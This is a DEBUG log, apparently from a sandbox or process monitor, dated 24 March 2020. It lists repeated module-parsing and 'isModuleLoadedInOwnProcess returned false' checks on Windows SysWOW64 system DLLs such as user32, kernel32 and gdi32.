2020-03-24 10:13:53,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,598 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:53,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:53,598 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,630 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:53,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:53,644 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:53,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:53,644 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:53,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:53,661 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:53,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:53,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,676 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,676 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,707 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,707 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,801 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,801 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,801 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,878 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,878 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,878 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,987 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,987 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,987 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,003 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,003 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,003 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,019 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,019 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,019 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,051 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,051 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,065 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,065 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,065 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,128 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,128 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,128 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,160 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,160 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,160 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,176 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,176 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,221 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,221 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,221 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,237 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,237 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,237 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,269 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,269 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,269 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,315 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,315 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,315 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,332 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,346 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,346 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,362 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,362 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,362 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,394 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,394 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,440 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,440 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,440 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,456 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,456 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,487 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,487 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:54,487 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:54,503 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:54,503 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:54,503 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:54,503 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:54,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,533 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2020-03-24 10:13:54,533 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
